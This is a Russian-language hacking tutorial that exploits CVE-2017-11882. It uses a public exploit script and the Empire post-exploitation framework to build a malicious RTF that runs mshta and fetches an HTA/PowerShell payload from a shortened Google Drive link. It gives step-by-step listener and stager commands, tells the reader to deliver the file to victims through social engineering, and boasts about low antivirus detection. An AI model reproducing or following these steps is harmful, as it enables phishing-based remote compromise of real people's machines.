CVE-2017-11882 или Взлом с помощью безобидного документа

CVE-2017-11882 или Взлом с помощью безобидного документа

@webware

t.me/webware

Всем привет. Сегодня хочу показать Вам эксплоит, с помощью которого мы получим доступ к целевой машине.


Коротко и по делу: 

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.


Поехали!

Источник : https://github.com/Ridter/CVE-2017-11882

Установка :

git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py

На этом все.


Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник : https://github.com/EmpireProject/Empire


Гайд по использованию Empire от DarkNode

Гайд по HTA что такое и с чем едят

Собственно говоря, поехали:


Listeners у меня уже есть, что бы их создать, проделаем :

listeners

uselistener http

Далее заполняем нужные поля с помощью set

Пример : set Name http - задать имя листенера http

set Host ip - пишем айпишник куда стучаться вистиму

set Port номер порта - пишем на какой порт стукать

execute - выполнить, создать


Далее у вас появится листенер. Можно вернутся в главное меню с помощью: main

Создание HTA

usestager windows/hta - использовать модуль

info - посмотреть инфу и обычно заполнить Listener

set Listener http (у меня так называется листенер "http")

set OutFile /tmp/hack1.hta - путь к сохранению файла и название

execute - генерим и получаем на выходе

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

Копируем это батву, идем в каталог где мы установили софт. У меня это :

cd CVE-2017-11882

Здесь исполняем следующее :

python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)


Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.


Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!

Источник codeby.net